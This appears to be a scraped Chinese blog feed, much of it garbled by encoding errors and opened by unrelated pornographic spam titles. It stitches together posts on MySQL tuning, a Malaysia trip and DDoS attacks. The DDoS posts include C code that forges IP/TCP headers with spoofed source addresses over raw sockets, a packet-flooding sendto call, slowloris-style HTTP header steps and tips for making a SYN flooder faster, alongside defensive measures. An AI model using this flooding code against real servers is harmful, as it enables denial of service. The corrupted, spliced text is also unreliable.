亚洲AV一二三区成人影片,亚洲精品中文字幕乱码三区,老司机亚洲精品影视www

天一 — Wed, 23 May 2012 14:19:00 GMT

�Q?�Q�提高数据库插入性能中心思想�Q?wbr>��量��数据一�ơ性写入到Data File和减��数据库的checkpoint 操作。这�ơ修改了下面四个配置��：
1�Q�将 innodb_flush_log_at_trx_commit 配置讑֮��?�Q�按�q�往�l�验讑֮��?�Q�插入速度会有很大提高�?/span>

0: Write the log buffer to the log file and flush the log file every second, but do nothing at transaction commit.
1�Q�the log buffer is written out to the log file at each transaction commit and the flush to disk operation is performed on the log file
2�Q�the log buffer is written out to the file at each commit, but the flush to disk operation is not performed on it

2�Q�将 innodb_autoextend_increment 配置�׃��默认8M 调整�?128M

此配�|�项作用主要是当tablespace �I�间已经满了后，需要MySQL�pȝ��需要自动扩展多��空��_��每次tablespace 扩展都会让各个SQL 处于�{�待状态�?/span>增加自动扩展Size可以减少tablespace自动扩展�ơ数�?/span>

3�Q�将 innodb_log_buffer_size 配置�׃��默认1M 调整�?16M

此配�|�项作用讑֮�innodb 数据库引擎写日志�~�存区；��此�~�存�D�增大可以减��数据库写数据文件次数�?br />

4�Q�将 innodb_log_file_size 配置�׃��默认 8M 调整�?128M

此配�|�项作用讑֮�innodb 数据库引擎UNDO日志的大��；从而减��数据库checkpoint操作�?br />

�l�过以上调整�Q?wbr>�pȝ��插入速度�׃��原来10分钟几万条提升至1�U?W左右�Q�注�Q?wbr>以上参数调整�Q�需要根据不同机器来�q�行实际调整。特别是 innodb_flush_log_at_trx_commit�?/span>innodb_log_buffer_size�?innodb_log_file_size 需要�}慎调��_��因�ؓ涉及MySQL本��n的容灑֤�理�?/span>

�Q?�Q�提升数据库��d��速度�Q?wbr>重数据库层面上读取速度提升主要�׃��几点�Q�简化SQL�?wbr>加烦引和分区�Q?�l�过��查程序SQL已经是最��单，查询条�g上已�l�增加烦引�?wbr>我们只能用武器：表分区�?br />

数据�?MySQL分区前准备：在MySQL中，表空间就是存储数据和索引的数据文件�?/li>
- ��S11数据库由于同享tablespace 修改为支持多个tablespace;
- ��wb_user_info_sina �?wb_user_info_tx 两个表修改�ؓ各自独立表空��_��Q�Sina�Q?700W数据�Q?.6G 大数据文�Ӟ��Tencent 1400W�Q?.3G大数据文�Ӟ��Q?/li>
分区操作�Q?/li>
- ��现有的主键和烦引先删除
- 重现建立id,uid 的联合主�?/li>
- 再以 uid 为键��D��行分区。这时候到/var/data/mysql 查看数据文�g�Q?wbr>可以看到两个大表各自独立表空间已�l�分割成若干个较��独立分区空间。（�q�时候若以uid 为检索条件进行查询，�q�不提升速度�Q?wbr>因�ؓ键值只是安排数据存储的分区�q�不会徏立分区烦引�?wbr>我非帔R��闯��Ҏ��Oracle 差得不是一点半炏V��）
- 再以 uid 字段上进行徏立烦引。再�ơ到/var/data/mysql 文�g�Ҏ��看数据文�Ӟ��非常郁闷地发现各个分区Size竟然大了�?wbr>MySQL�q�是老样子将索引与数据存储在同一个tablespace里面。若能index �?数据分离能够更加好管理�?br />

�l�过以上调整�Q�暂时没能体现出�pȝ��d��速度提升�Q�基本都是在 2~3�U�完�?K数据更新�?/div>

天一 2012-05-23 22:19 发表评论

天一 — Sun, 13 Mar 2011 15:09:00 GMT

现在�|�络技术日新月�?/span> �Q�不断有新技术被不同�c�d��软�g所使用。在提高开发��Y件各个方面性能同时�Q�也增加了系�l�安全隐患。例如：云技术能够�ؓ我们带来了一个更加有效地利用�|�络资源和整合网�l�数据模式；不过�Q�这个新技术引��Z��安全的担心�?

�|�络安全是涉及到�|�络各个斚w��内容�Q�现在最为突出问题就是网�l�攻凅R��根据近�q�来接触到问题，�ȝ��了下面几个现在比较常用网�l�攻��L��法和一些防御测试�?/p>

DDos--分布式拒�l�服务攻�?/h3>
 DDos �?Distributed Denial of service , �q�种��d��h��?996�q�_��此攻��M��要利用合理的服务��h��来占用过多的服务资源�Q�从而��服务器无法处理合法用��L��指��o。有以下主要几种具体��d��手段�Q?/p>
�Q?�Q�SYN �z�水��d��

 原理�Q�SYN �z�水��d��主要是利用TCP协议�~�陷�Q�通过“肉鸡”伪造地址和发送大量的半连接请求，使得��L��一直等待半�q�接��h��的回复。通过此方法不断耗费��L��有限的CPU资源和内存资源�?/p>
 ��d��手段�Q�一般都是开发专门制造洪水攻�ȝ��序；�E�序核心主要是伪造一个TCP协议信息头和IP协议的信息头

TCP_HEADER tcpheader;

 IP_HEADER ipheader;

 //填充IP首部

 ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));

 ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));

 ipheader.ident = 1;

 ipheader.frag_and_flags = 0;

 ipheader.ttl = 128;

 ipheader.proto = IPPROTO_TCP;

 ipheader.checksum =0;

 ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);

 ipheader.destIP = inet_addr(DestIP);

 //填充TCP首部

 tcpheader.th_dport=htons(port);

 tcpheader.th_sport = htons(8080);

 tcpheader.th_seq = htonl(SEQ+SendSEQ);

 tcpheader.th_ack = 0;

 tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);

 tcpheader.th_flag = 2;

 tcpheader.th_win = htons(16384);

 tcpheader.th_urp = 0;

 tcpheader.th_sum =

TCP_HEADER tcpheader; IP_HEADER ipheader; //填充IP首部 ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); ipheader.ident = 1; ipheader.frag_and_flags = 0; ipheader.ttl = 128; ipheader.proto = IPPROTO_TCP; ipheader.checksum =0; ipheader.sourceIP = htonl(FakeIpHost+SendSEQ); ipheader.destIP = inet_addr(DestIP); //填充TCP首部 tcpheader.th_dport=htons(port); tcpheader.th_sport = htons(8080); tcpheader.th_seq = htonl(SEQ+SendSEQ); tcpheader.th_ack = 0; tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0); tcpheader.th_flag = 2; tcpheader.th_win = htons(16384); tcpheader.th_urp = 0; tcpheader.th_sum =
 防�M手段�Q?/p>
 1�Q��用硬防火墙过滤；��g防火墙明显提高防御性能�Q�基本能拦截95%~99%的攻��M��息包�Q�服务器依然会接受到��d��的信息包。缺点：只能被动提高防�M性能

 2�Q��用门户代理过滤；防�M效果非常明显�Q�曾�l�试�q�被20G数据��d��。经�q�美国某防�M门户�q��o后，大概只有几十K有效数据发送到服务器上。缺点：在��用了防�M门户后，服务端与客户端之交互延时非常严重�Q?gt;1000MS�Q��?/p>
 3�Q�修�Ҏ��务器一些网�l�安全参数设�?如：Window 可以修改下面一些配�|�SynAttackProtect�Q�TcpMaxPortsExhausted�Q�TcpMaxHalfOpen�? TcpMaxHalfOpenRetried�{�；更加详细相关配置讑֮�介绍可以到网上搜索一�?应该不少。系�l�的防�M性能提高有限�Q�但无需要�Q何投入�?/p>
 4�Q�机器群集均衡负载；�q�个�Ҏ��是一个最有效和成本最高的�Ҏ��。这里我��׃��多讲最后这个方法啦�?/p>
 �ȝ��Q�SYN�z�水��d��主要是攻��L��与防御方比拼��g资源和防御策略�?/p>
�Q?�Q�流量攻�?/p>
 原理�Q�流量攻��M��要是“肉鸡”通过对目的主机的服务端口发送大量的垃圾数据�Q�导致目的主机的�|�络堵塞。在�|�络上很多文章都会将SYN�z�水��d��和流量攻击视作�ؓ相同手段。从监控软�g来看�Q�被�q�两�U�攻��L��候都会表��Cؓ�|�络��量暴涨��D��|�络堵塞。其实，�q�两�U�攻�ȝ��|�络堵塞原因是有本质上区别的。流量攻��d��致网 �l�堵塞是某些IP机器实际发送大量垃圾信息去耗尽��L��带宽�Q�SYN�z�水��d��D��|�络堵塞是目标主机本�w�所有资源被伪造半�q�接��h��耗尽了，使得机器�Ҏ��不能 �l�箋接受新连接�?/p>
 ��d��手段�Q�最��单流量攻�ȝ��序都是将��单Socket �E�序中的sendBuf 修改为大�?4K数据块就可以了�?/p>


// 一般都是将'sendBuf' 讑֮��?4K以上随机的垃圾数�?/span>

sendto(sock,sendBuf,dataSize,0,(struct sockaddr) &sockAddr,sizeof(sockAddr));

// 一般都是将'sendBuf' 讑֮��?4K以上随机的垃圾数�? sendto(sock,sendBuf,dataSize,0,(struct sockaddr) &sockAddr,sizeof(sockAddr));
 防�M手段�Q?/p>
 1�Q��用硬防火墙过滤；�Ҏ��服务�E�序现状讑֮�合适策略，基本拦截95~99%的垃圾信息；��量��d��拦截非常依靠��g防火墙设定策略，有效�{�略会大大提高系�l�防御性能�?/p>
 2�Q��用门户代理过滤；参照【SYN�z�水��d��】相应描�q?

 3�Q�优化服务端�E�序解密��法

 现在一般网�l�上C/S 或者B/S 架构模式的程序，在系�l�互盔R��信指��o上基本都是密文。当�pȝ��服务端程序受到攻��L��候，服务的解密算法就会受到巨大压力，很容易导致服务器资源耗尽。所以， ��Z��提高�pȝ��在高压力下生存率�Q�选择高效解密�Ҏ��是很有必要�?/p>
 4�Q�增加服务端�E�序�|�络异常处理

 在一定高压力情况下，除了需要确保服务端�?#8221;�E�_��?#8220;�Q�还需要确保系�l�的”准确�?#8220;。对一些网�l�异�怸�断的情况�Q�制定一些补救性措施和机制。特别是一些实时性系�l�特别重要，按过往�l�验在一定压力情况下会出现非常离谱错误�?/p>
 5�Q�增加服务端�E�序防�M�{�略

 �׃��DDos ��d��往往都��用IP地址”�ƺ骗“技术，在行业里面暂时没有比较有效的反击�Ҏ��。所以，现在最��行防�M�{�略��是服务�?#8221; 装死 “。��n边其他�h�U�Cؓ” 信息忽略回馈机制“�Q�主要思想��是当系�l�收��C��个不能识别的指��o时候，立即掉弃�q�接和不对连接作��Z�Q何反馈信息。除�?#8221; 信息忽略回馈机制“外，�q�有一些商业上和业务上防�M�{�略。如�Q?账户锁定�{�略�Q�IP锁定�{�略和服务器认证�{�略�{��?/p>
 �ȝ��Q�流量攻��L��验防御方�|�络��量�Q�系�l�安全策略，�pȝ��异常处理和系�l�性能。在��目旉��允许情况下，�q�个��试是必不可��的�?/p>
�Q?�Q�HTTP�z�水��d��

 原理�Q�HTTP�z�水是利用【应用层】中HTTP协议�~�陷�Q�不断发送没有完成的HTTP��_��直到你的服务器耗尽所有的资源�?/p>
 ��d��手段�Q?/p>
 1�Q�首先向服务器发出如下HTTP头部�Q?br /> GET / HTTP/1.1\r\n
 Host: host\r\n
 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
 Content-Length: 42\r\n

 2�Q�然后每隔一定时间��l�发��Z��个自定义的头部：
 X-a: b\r\n
 ��ȝ��Ҏ��HTTP协议�Q�HTTP��h��头部与请求主体的分隔是多一个\r\n。也��是说上�q�的HTTP头部一直没有发送完成，HTTP服务器会�{�在那里准备接受余下的内容，一直到接受��时�Q�然后关闭连接。默认的apache��d��头部的超时据说是3000�U�。Apache的情冉|��Q�每接受一个连接新开一个进�E? 或线�E�，�q�样新接受一个连接的资源消耗很大，我测试的�q�结果是�Q�一般apache只需在超时时间内�Q�持�l�发�?00个以上的包，apache��׃��会再接收新的�q�接了�?/p>
 防�M手段�Q?/p>
 1�Q�减��HTTP头部�q�接��时的时��_��其是HTTP��h��中GET、HEAD�Ҏ��的超时时间。注意一般POST�Ҏ��的头部包含了上传的内容，所以传输时间会很长�Q�要避免��合法的��h��提前关闭�?br /> 2�Q�限定单个IP的连接数。缺�Ҏ��Q�有些学校、大公司都通过NAT方式�q�接互联�|�，所以同一个IP的连接数会很多�?br /> 3�Q�特别针对Apache�Q�将Nginx此类反向服务器放在apache前面�Q�用来撑�q�接�Q�代理合法的��h��?/p>
 4�Q��用硬防火墙过滤；

 5�Q��用门户代理过滤；

 �ȝ��Q�HTTP协议的缺陷其实是TCP/IP协议�~�陷的一个�g伸，只是表现在应用层�|�络协议面上�?/p>
本�h水��^有限�Q�若有不准确地方�Ƣ迎提出�?/p>

天一 2011-03-13 23:09 发表评论

天一 — Tue, 30 Nov 2010 15:00:00 GMT

�W�一�?2010-12-10 �q�州->吉隆�?21:05-01:10(12-11)
预计大概 1�Q?5 分左叛_��以入�?tune hotel ( tune hotel 地址: Tune Hotels - KLIA-LCCT Airport Within Low Cost Carrier Terminal ( near Pos Malaysia ) Lot PT 29, Jalan KLIA S4, 64000 KLIA Selangor Darul Ehsan)

Tel: 006(03) 79625888 [ Mon - Fri 9:00am - 9:00 pm (excluding public holiday)]
其实,在LCCT 的tune hotel非常�Ҏ��找，因�ؓ你在国际到达��Z��出来以后�Q�向左看��可以看�?tune hotel 的招牌。当�Ӟ��我会在国际到辑֌�的出口接你机�?br />

�W�二�?2010-12-11
        6�Q?0 起床
        7:30-8:30 坐飞机到吉隆�?> 兰卡�?
        9�Q?0 到酒�?Awana Porto Malai Hotel
        酒店名称:    Awana Porto Malai Hotel
        酒店地址:     Tanjung Malai
Tel : +44 (0)20 3027 7900

        9:30 参加LGK 半天游[在酒店大堂看看有什么团可以参加�?]
        可以选内�?
                        东方�?�~��R(天空之桥)
                        瓜镇购物-巧克�?br />                         雄鹰�q�场
                        环岛�?按同事讲是去D,无�h��岛度玩和游�?
        17:00 完成LGK 半天�?��d��晚饭.Pantai Chenang(珍南沙�W) 灯笼��鲜/真浪�?br />         晚上��d��[虎虾]�c�L�v�?需要查找下有哪些店是好吃的)

�W�三�?2010-12-12
       在兰卡威,参加潜水�z�d��
        17:00 完成LGK 半天�?��d��晚饭.暂时没选到.

�W�四�?2010-12-13
        13:25-14:30 兰卡�?吉隆�?
        在one U ��Z��购买,明天上geting 的�R��?br />         回我宿舍�Q�顺便去下黑风洞batu Caves (黑风�z?(gua galeri)
        游览�?batu Caves �?我们��Z��吃肉骨茶,之后��可以去KL 最�J�华的bukit bindang走走;再去KLCC看夜�?br />         [�q�天行程有点儿赶,可能会取消batu Caves的游览]

�W�五�?2010-12-14 吉隆坡一�?/strong>
        上云��?可以玩��一�?br />         一下�R,��p��买当天晚下Genting 的�R��?再坐�~��R上云��?
        晚上下来,去mid valley 的madam kwan吃椰��饭

�W�六�?2010-12-15 吉隆�?�q�州
        上午自由�z�d�� : 在One U ,可以��M��手信和购�?
        12:30 坐�R到机�?上机回广�?(可以在免�E�区看看有咩岩的商品)

天一 2010-11-30 23:00 发表评论

【�{】SYN ��d��讲解

天一 — Fri, 18 Sep 2009 01:58:00 GMT
�Q?�Q�SYN Flood
 �W�一部分 SYN Flood的基本原�?
 SYN Flood是当前最��行的DoS�Q�拒�l�服务攻击）与DDoS�Q�分布式拒绝服务��d��Q�的方式之一�Q�这是一�U�利用TCP协议�~�陷�Q�发送大量伪造的TCP�q�接��h��Q�从而��得被��d��方资源耗尽�Q�CPU满负��h��内存不��Q�的��d��方式。要明白�q�种��d��的基本原理，�q�是要从TCP�q�接建立的过�E�开始说��P��大家都知道，TCP与UDP不同�Q�它是基于连接的�Q�也��是��_��Z��在服务端和客��L��之间传送TCP数据�Q�必��d��建立一个虚拟电路，也就是TCP�q�接�Q�徏立TCP�q�接的标准过�E�是�q�样的：

 首先�Q�请求端�Q�客��L��Q�发送一个包含SYN标志的TCP报文�Q�SYN卛_��步（Synchronize�Q�，同步报文会指明客��L��使用的端口以及TCP�q�接的初始序��P��

 �W�二步，服务器在收到客户端的SYN报文后，��返回一个SYN+ACK的报文，表示客户端的��h��被接受，同时TCP序号被加一�Q�ACK即确认（Acknowledgement�Q��?br />
 �W�三步，客户端也�q�回一个确认报文ACK�l�服务器端，同样TCP序列可��加一�Q�到此一个TCP�q�接完成。以上的�q�接�q�程在TCP协议中被�U�Cؓ三次握手�Q�Three-way Handshake�Q�。问题就出在TCP�q�接的三�ơ握手中�Q�假设一个用户向服务器发送了SYN报文后突然死机或掉线�Q�那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的（�W�三�ơ握手无法完成）�Q�这�U�情况下服务器端一般会重试�Q�再�ơ发送SYN+ACK�l�客��L��Q��ƈ�{�待一�D�|��间后丢弃�q�个未完成的�q�接�Q�这�D�|��间的长度我们�U�CؓSYN Timeout�Q�一般来说这个时间是分钟的数量��Q�大�U��ؓ30�U?2分钟�Q�；一个用户出现异常导致服务器的一个线�E�等�?分钟�q�不是什么很大的问题�Q�但如果有一个恶意的��d��者大量模拟这�U�情况，服务器端��ؓ了维护一个非常大的半�q�接列表而消耗非常多的资�?---��C��万计的半�q�接�Q�即使是��单的保存�q��历也会消耗非常多的CPU旉��和内存，何况�q�要不断对这个列表中的IP�q�行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的�l�果往往是堆栈溢出崩�?--即��服务器端的系�l��够强大，服务器端也将忙于处理��d��者伪造的TCP�q�接��h��而无暇理睬客��L��正常��h��Q�毕竟客��L��的正常请求比率非�怹��）�Q�此时从正常客户的角度看来，服务器失��d��应，�q�种情况我们�U�C��Q�服务器端受��C��SYN Flood��d��Q�SYN�z�水��d��Q��?br />
 从防御角度来��_��有几�U�简单的解决�Ҏ��:
 �W�一�U�是�~�短SYN Timeout旉��Q�由于SYN Flood��d��的效果取决于服务器上保持的SYN半连接数�Q�这个�?SYN��d��的频�?x SYN Timeout�Q�所以通过�~�短从接收到SYN报文到确定这个报文无效�ƈ丢弃改连接的旉��Q�例如设�|��ؓ20�U�以下（�q�低的SYN Timeout讄��可能会媄响客��L��正常讉K��Q�，可以成倍的降低服务器的负荷�?br />
 �W�二�U�方法是讄��SYN Cookie�Q�就是给每一个请求连接的IP地址分配一个Cookie�Q�如果短旉��内连�l�受到某个IP的重复SYN报文�Q�就认定是受��C��d��Q�以后从�q�个IP地址来的包会被一概丢弃�?br />
 可是上述的两�U�方法只能对付比较原始的SYN Flood��d��Q�羃短SYN Timeout旉��仅在�Ҏ��d��频度不高的情况下生效�Q�SYN Cookie更依赖于�Ҏ��使用真实的IP地址�Q�如果攻击者以��C��/�U�的速度发送SYN报文�Q�同时利用SOCK_RAW随机改写IP报文中的源地址�Q�以上的�Ҏ��毫无用武之地�?br />
 �W�二部䆾 SYN Flooder源码解读
 下面我们来分析SYN Flooder的程序实现。首先，我们来看一下TCP报文的格式：
 0 1 2 3 4 5 6

 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | �Q�Ｐ首部 | �Q�_�E�Q�首�?nbsp; | �Q�_�E�Q�数据段　　 |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 图一 TCP报文�l�构
 如上图所�C�，一个TCP报文�׃��个部分构成：20字节的IP首部�?0字节的TCP首部与不定长的数据段�Q�（实际操作时可能会有可选的IP选项�Q�这�U�情况下TCP首部向后��g�Q�由于我们只是发送一个SYN信号�Q��ƈ不传递�Q何数据，所以TCP数据�D��ؓ�I�。TCP首部的数据结构�ؓ�Q?br />
 0 1 2 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 十六位源端口�?nbsp; | 十六位目标端口号 |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 三十二位序列�?nbsp; |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 三十二位��认�?nbsp; |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 四位 | |U|A|P|R|S|F| |

 | 首部 |六位保留�?|R|C|S|S|Y|I| 十六位窗口大��?nbsp; |

 | 长度 | |G|K|H|T|N|N| |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 十六位校验和 | 十六位紧急指�?nbsp; |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 选项�Q�若有） |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 | 数据�Q�若有） |

 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 图二 TCP首部�l�构

 �Ҏ��TCP报文格式�Q�我们定义一个结构TCP_HEADER用来存放TCP首部�Q?br /> typedef struct _tcphdr
 {
 USHORT th_sport; //16位源端口
 USHORT th_dport; //16位目的端�?br /> unsigned int th_seq; //32位序列号
 unsigned int th_ack; //32位确认号
 unsigned char th_lenres; //4位首部长�?6位保留字中的4�?br /> unsigned char th_flag; //2 位保留字+6位标志位
 USHORT th_win; //16位窗口大��?br /> USHORT th_sum; //16位校验和
 USHORT th_urp; //16位紧急数据偏�U�量
 }TCP_HEADER;
 通过以正��的数据填充�q�个�l�构�q�将TCP_HEADER.th_flag赋��gؓ2�Q�二�q�制�?0000010�Q�我们能刉��一个SYN的TCP报文�Q�通过大量发送这个报文可以实现SYN Flood的效果。但是�ؓ了进行IP�ƺ骗从而隐藏自己，也�ؓ了躲避服务器的SYN Cookie��查，�q�需要直接对IP首部�q�行操作�Q?br />
 0 1 2 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 版本 | 长度 | 八位服务�c�d�� | 十六位总长�?nbsp; |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 十六位标�?nbsp; | 标志| 十三位片偏移　　 |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 八位生存旉�� | 八位协议 | 十六位首部校验和 |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 三十二位源ﾃ�Q�地址 　 |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 三十二位目的�Q�Ｐ地址 |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 选项�Q�若有） |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | 　　数据　　 |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 图三 IP首部�l�构

 同样定义一个IP_HEADER来存放IP首部
 typedef struct _iphdr
 {
 unsigned char h_verlen; //4 位首部长�?4位IP版本�?br /> unsigned char tos; //8位服务类型TOS
 unsigned short total_len; //16位总长度（字节�Q?br /> unsigned short ident; //16 位标�?br /> unsigned short frag_and_flags; //3位标志位
 unsigned char ttl; //8 位生存时�?TTL
 unsigned char proto; //8位协议号(TCP, UDP 或其�?
 unsigned short checksum; //16位IP首部校验�?br /> unsigned int sourceIP; //32 位源IP地址
 unsigned int destIP; //32位目的IP地址
 }IP_HEADER;
 然后通过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));建立一个原始套接口�Q�由于我们的IP源地址是伪造的�Q�所以不能指望系�l�帮我们计算IP校验和，我们得在在setsockopt中设�|�IP_HDRINCL告诉�pȝ��自己填充IP首部�q�自��p��校验和�Q?br />
 flag=TRUE;
 setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));

 IP校验和的计算�Ҏ��是：首先��IP首部的校验和字段设�ؓ0�Q�IP_HEADER.checksum=0�Q?然后计算整个IP首部�Q�包括选项�Q�的二进制反码的和，一个标准的校验和函数如下所�C�：

 USHORT checksum(USHORT *buffer, int size)
 {
 unsigned long cksum=0;
 while(size >1) {
 cksum+=*buffer++;
 size -=sizeof(USHORT);
 }
 if(size ) cksum += *(UCHAR*)buffer;
 cksum = (cksum >> 16) + (cksum & 0xffff);
 cksum += (cksum >>16);
 return (USHORT)(~cksum);
 }

 �q�个函数�q�没有经�q��Q何的优化�Q�由于校验和函数是TCP/IP协议中被调用最多函��C��一�Q�所以一般说来，在实现TCP/IP栈时�Q�会�Ҏ��操作�pȝ��Ҏ��验和函数�q�行优化。TCP首部��验和与IP首部校验和的计算�Ҏ��相同�Q�在�E�序中��用同一个函数来计算。需要注意的是，�׃��TCP首部中不包含源地址与目标地址�{�信息，��Z��保证TCP校验的有效性，在进行TCP校验和的计算�Ӟ��需要增加一个TCP伪首部的校验和，定义如下�Q?br />
 struct
 {
 unsigned long saddr; //源地址
 unsigned long daddr; //目的地址
 char mbz; // �|�空
 char ptcl; //协议�c�d��
 unsigned short tcpl; //TCP长度
 }psd_header;

 然后我们��这两个字段复制到同一个缓冲区SendBuf中�ƈ计算TCP校验和：
 memcpy(SendBuf,&psd_header,sizeof(psd_header));
 memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
 tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

 计算IP校验和的时候不需要包括TCP伪首部：
 memcpy(SendBuf,&ip_header,sizeof(ip_header));
 memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
 ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_header));
 再将计算�q�校验和的IP首部与TCP首部复制到同一个缓冲区中就可以直接发送了�Q?br /> memcpy(SendBuf,&ip_header,sizeof(ip_header));
 sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr));

 因�ؓ整个TCP报文中的所有部分都是我们自己写入的�Q�操作系�l�不会做��M��q�涉�Q�，所以我们可以在IP首部中放�|�随机的源IP地址�Q�如果伪造的源IP地址��实有�h使用�Q�他在接收到服务器的SYN+ACK报文后会发送一个RST报文�Q�标志位�?0000100�Q�，通知服务器端不需要等待一个无效的�q�接�Q�可是如果这个伪造IP�q�没有绑定在��M��的主��Z��Q�不会有��M��讑֤�去通知��L��该连接是无效的（�q�正是TCP协议的缺��P��Q�主机将不断重试直到SYN Timeout旉��后才能丢弃这个无效的半连接。所以当��d��者��用主机分布很�E�疏的IP地址�D�进行伪装IP的SYN Flood��d��Ӟ��服务器主机承受的负荷会相当的高，�Ҏ��试�Q�一台PIII 550MHz+128MB+100Mbps的机器��用经�q�初步优化的SYN Flooder�E�序可以�?6,000�?�U�的速度发送TCP SYN报文�Q�这��L��d��力已�l��以拖垮大部分WEB服务器了。稍微动动脑�{�我们就会发玎ͼ�惛_��SYN Flooder�E�序�q�行优化是很��单的�Q�从�E�序构架来看�Q�攻��L��循环内的代码主要是进行校验和计算与缓冲区的填充，一般的思�\是提高校验和计算的速度�Q�我甚至见过用汇�~�代码编写的校验和函敎ͼ�实际上，有另外一个变通的�Ҏ��可以��L��实现优化而又不需要高��q��~�程技巧和数学知识�Q�（老实说吧�Q�我数学比较�?P�Q�，我们仔细研究了两个不同源地址的TCP SYN报文后发玎ͼ�两个报文的大部分字段相同�Q�比如目的地址、协议等�{�）�Q�只有源地址和校验和不同�Q�如果�ؓ了隐蔽，源端口也可以有变化，但是�q�不影响我们��法优化的思�\�Q�，如果我们事先计算好大量的源地址与校验和的对应关�p�表�Q�如果其他的字段有变化也可以加入�q�个表）�Q�等计算完毕了攻�ȝ��序就只需要单�U�的�l�合�~�冲区�ƈ发送（用指针来直接操作�~�冲区的特定位置�Q�从事先计算好的对应关系表中��d��数据�Q�替换缓冲区相应字段�Q�，�q�种��单的工作完全取决于系�l�发�?IP包的速度�Q�与�E�序的效率没有�Q何关�p�，�q�样�Q�即使是CPU主频较低的主��Z��能快速的发送大量TCP SYN��d��包。如果考虑到缓冲区拼接的时��_��甚至可以定义一个很大的�~�冲区数�l�，填充完毕后再发送（雏鹰�l�这�U�方法想了一个很贴切的比喻：火箭炮装弹虽然很慢，但是一旦炮弹上膛了以后��可以连�l�猛烈地发射�?�Q��?br />
 �W�三部分 SYN Flood��d��的监��与防�M初探
